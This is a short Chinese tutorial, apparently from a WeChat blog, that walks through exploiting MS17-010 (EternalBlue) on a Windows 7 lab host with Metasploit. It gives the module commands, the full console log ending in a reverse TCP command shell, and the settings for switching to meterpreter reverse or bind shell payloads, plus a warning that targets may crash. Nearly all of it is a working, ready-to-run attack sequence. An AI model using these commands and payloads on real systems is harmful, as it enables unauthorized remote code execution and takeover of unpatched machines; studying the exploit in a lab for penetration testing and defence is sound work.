命令:

use exploit/windows/smb/ms17_010_eternalblue

set rhosts 【IP】

run

打印结果:

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。 
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.119.136:4444
[+] 192.168.119.139:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.139:445 - Connecting to target for exploitation.
[+] 192.168.119.139:445 - Connection established for exploitation.
[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.119.139:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.119.139:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.119.139:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.119.139:445 - Starting non-paged pool grooming
[+] 192.168.119.139:445 - Sending SMBv2 buffers
[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.139:445 - Sending final SMBv2 buffers.
[*] 192.168.119.139:445 - Sending last fragment of exploit packet!
[*] 192.168.119.139:445 - Receiving response from exploit packet
[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.139:445 - Sending egg to corrupted connection.
[*] 192.168.119.139:445 - Triggering free of corrupted buffer.
[*] Command shell session 4 opened (192.168.119.136:4444 -> 192.168.119.139:49169) at 2019-10-10 21:14:11 +0800
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>

利用永恒之蓝成功!但返回的只是一个cmdshell ;

因为msf默认用的paylaod是:payload/windows/x64/shell/reverse_tcp

我们可以设置成其他payload: set payload windows/x64/meterpreter/reverse_tcp
只要设置rhostsrport就OK了;

exploit 运行,这个时候就反弹的就是一个meterpreter会话 (更强的payload)。

使用正向的payload也是可以的:set payload windows/x64/meterpreter/bind_tcp


注意

有ms17_010漏洞的主机,一般都是旧版windows系统的主机,用攻击模块的时候,可能会导致主机的蓝屏宕机,所以需要谨慎一些。


参考

https://cloud.tencent.com/developer/article/1541123

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄